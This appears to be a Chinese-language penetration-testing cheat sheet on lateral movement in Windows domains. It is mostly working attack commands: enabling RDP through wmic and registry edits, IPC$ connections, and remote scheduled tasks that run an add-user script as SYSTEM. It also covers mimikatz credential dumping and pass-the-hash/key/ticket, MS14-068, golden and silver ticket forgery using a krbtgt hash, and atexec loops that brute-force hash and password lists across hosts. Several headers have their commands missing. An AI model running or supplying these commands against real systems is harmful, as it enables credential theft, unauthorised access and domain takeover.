域用户主机上传mimikatz
procdump
开启的3389方法:
1.通用开3389(优化后):
2.For Win2003:
3.For Win2008:
4.For Every:
cmd开3389 win08 win03 win7 win2012 winxp
win08,三条命令即可:
wmic /namespace:\root\cimv2 erminalservices path
win32_terminalservicesetting where (__CLASS != “”) call
setallowtsconnections 1
wmic /namespace:\root\cimv2 erminalservices path
win32_tsgeneralsetting where (TerminalName =‘RDP-Tcp’) call
setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v
fSingleSessionPerUser /t REG_DWORD /d 0 /f
win2012通用;win7前两条即可。权限需要run as administrator。
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令及相关工具的使用,在已知目标系统的用户明文密码或者hash的基础上,直接可以在远程主机上执行命令。
获取到某域主机权限->minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文,hash当做密码字典-》尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令
一、利用流程
net use \server\ipc$“password” /user:username # 工作组
net use \server\ipc$“password” /user:domain\username #域内
dir \xx.xx.xx.xx\C$\ # 查看文件列表
copy \xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \xx.xx.xx.xx\C$\1.bat # 复制文件
net use \xx.xx.xx.xx\C$\1.bat /del # 删除IPC
net view xx.xx.xx.xx # 查看对方共享
建立IPC常见的错误代码
(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题
(4)67:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码
建立IPC失败的原因
(1)目标系统不是NT或以上的操作系统
(2)对方没有打开IPC$共享
(3)对方未开启139、445端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误
二、[at] & [schtasks]
#at 小于等于windows2008
net use \192.168.1.5 Password /user:admin # 建立ipc连接:
copy add.bat \192.168.1.5\C$\Inetpub # 拷贝执行脚本到目标机器
net time \192.168.1.5 # 查看目标时间,可能本地时间与目标时间不符
at \192.168.1.5 21:52 c:\Inetpub\add.bat # 添加计划任务
at \192.168.1.5 # 查看任务列表
#schtasks 大于windows2008
net use \192.168.1.5 Password /user:admin # 建立ipc连接:
copy add.bat \192.168.1.5\C$\Inetpub # 拷贝执行脚本到目标机器
net time \192.168.1.5 # 查看目标时间,可能本地时间与目标时间不符
schtasks /create /s 192.168.1.5 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\Inetpub\add.bat /F #创建adduser计划任务
schtasks /run /s 192.168.1.5 /tn adduser /i #运行adduser计划任务
schtasks /delete /s 192.168.1.5 /tn adduser /f # 删除计划任务
自带WMIC 明文传递 无回显
RDP明文密码链接
RDP密文HASH链接
开启后运行:
PTK(pass the key) #利用的aeskey进行的渗透测试
#获取用户aes key
mimikatz “privilege::debug” “sekurlsa::ekeys”
#注入aes key
mimikatz “privilege::debug” “sekurlsa::pth /user:mary /domain:god.org /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288”
#目标系统:安装kb2871997补丁
Kerberos协议在域中,简要介绍一下:
MS14-068,Golden ticket(黄金票据),SILVER ticket(白银票据)
#MS14-068
#查看当前sid whoami/user
mimikatz # kerberos::purge
//清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list
//查看当前机器凭证
mimikatz # kerberos::ptc
票据文件 //将票据注入到内存中
#利用ms14-068生成TGT数据
#票据注入
#查看凭证列表 klist
#利用net use载入
net use \192.168.3.21\c$
dir \192.168.3.21\c$
#利用kekeo生成TGT数据
#生成票据
#导入票据
#查看凭证 klist
#利用net use载入
net use \192.168.3.21\c$
dir \192.168.3.21\c$
权限维持-Golden ticket
#伪造黄金凭据需要具备下面条件:
#域控DC导出hash krbtgt
privilege::debug
lsadump::lsa /patch
b097d7ed97495408e1537f706c357fc5
#生成tgt凭证
#注入凭证
#查看凭证 klist
##利用net use载入
net use \192.168.3.21\c$
dir \192.168.3.21\c$
权限维持-silver ticket
#域控导出hash
#攻击3.21下的cifs(文件共享服务)
PTT(pass the ticket) #利用的票据凭证TGT进行的渗透测试
#利用hash验证主机列表ips.txt
FOR /F %%i in (ips.txt) do atexec.exe -hashes :HASH ./administrator@%%i whoami
#指定主机进行用户hash列表(hashes.txt)爆破
FOR /F %%i in (hashes.txt) do atexec.exe -hashes %%i ./[email protected] whoami
#指定主机进行明文密码列表(passwords.txt)爆破
FOR /F %%i in (passwords.txt) do atexec.exe ./administrator:%%[email protected] whoami
#利用明文密码验证主机列表ips.txt
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:password123@%%i whoami